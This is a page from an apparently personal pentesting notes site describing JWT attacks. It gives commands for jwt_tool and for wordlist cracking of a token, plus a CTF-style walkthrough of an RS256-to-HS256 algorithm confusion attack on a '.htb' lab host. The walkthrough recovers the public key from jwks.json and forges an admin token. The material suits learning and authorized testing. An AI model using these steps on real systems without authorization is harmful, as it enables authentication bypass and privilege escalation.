Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
Powered by GitBook
On this page
  • Basic JWT Information Using JWT_TOOL
  • Cracking JWT-Token using JWT-CRACKER
  • Algorithm Confusion Attacks in JWT Token
  • When Public key is Available on the Web Server (Utilizing JWKS.JSON file)
  1. Web Pentesting Stuff
  2. Pentesting Port 80,443

Pentesting JWT (JSON Web Tokens)

PreviousJavascript DeObfuscationNextPentesting Graphql

Last updated 5 months ago

Basic JWT Information Using JWT_TOOL

python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0XzQ1MzAiLCJpYXQiOjE3Mjk4ODYxNTR9.cCgbU50zeYpH0cUZ9ioFe9eaHqmXp6b2ffkpTJ5-zAg

Cracking JWT-Token using JWT-CRACKER

jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0XzQ1MzAiLCJpYXQiOjE3Mjk4ODYxNTR9.cCgbU50zeYpH0cUZ9ioFe9eaHqmXp6b2ffkpTJ5-zAg -d /usr/share/wordlists/rockyou.txt

Algorithm Confusion Attacks in JWT Token

When Public key is Available on the Web Server (Utilizing JWKS.JSON file)

We can start testing for Algorithm Confusion attacks by simply changing the algorithm of the jwt token into HS256 from RS256

The question is that we need to find the public key, otherwise, this attack will never work, and we will not be able to sign our JWT token

Looking below at the image we can see that i want to create a webhook and i am having 403 forbidden, so i can try to do an Algorithm Confusion attack to get a 200 OK response.

Now the Problem here is that we need to get the Public key, now we need to find it on the server by doing different directory Bruteforcing tools, I can use here Feroxbuster.

Luckily I was able to find the Jwks.json file by doing directory Bruteforcing

feroxbuster -u http://webhooks-api-beta.cybermonday.htb/ -W 0,57

Now I need to convert this into a proper format and then sign the JWT token and I will change the user role to admin and let's see whether I can access the /create/webhook endpoint or not

for this purpose, i will be using Python3

>>> import base64 //import the module
>>> from Crypto.PublicKey import RSA //import the module
>>> int.from_bytes(base64.b64decode("AQAB"),'big') //get in exponent form
>>> e= int.from_bytes(base64.b64decode("AQAB"),'big') // save in e variable

>>> n= int.from_bytes(base64.urlsafe_b64decode("pvezvAKCOgxwsiyV6PRJfGMul-WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w=="),'big') //get in exponent form and save in variable n 

>>> RSA.construct((n,e))
RsaKey(n=21077705076198164110050345996612932810772518568443539050967722091376715840724373912088648727462840166356037836008797866810613752598694921174993091914759002593675145922598909469318911554819111261819241455997350276504601809923734199273292278943649872262588721789631926559440043091439126662856921713786579174831565901935033306650397146382742890508658151492282389201858268597532677527914866223650606412599907677018538379813464063685144477862245532615744296358390508702719361603975980307523385389095548127340792700450704825980888363887958403440479605178094454574416540689804276427673977731782835533403716740628865097430507, e=65537) // make a public key

key =RSA.construct((n,e)) // save the public key in key variable

print(key.exportKey().decode()) // print the public key

I will base64 encode this public key by saving it into a file

 base64 public-key -w 0

now I can use this public key to sign the JWT Token and then and then I can change the account role in https://jwt.io/ and hopefully I will be able to access the webhook page.

Finally, it worked I am not getting 403 error anymore which means I have successfully done an Algorithm Confusion attack.

Current JWT Token does not allow to create a WebHook
We can see the algorithm that is RS256
Found jwks file on the webserver using feroxbuster
Contents of the Jwks.json file which contains the public key
Successfully completed the algoritm confusion attack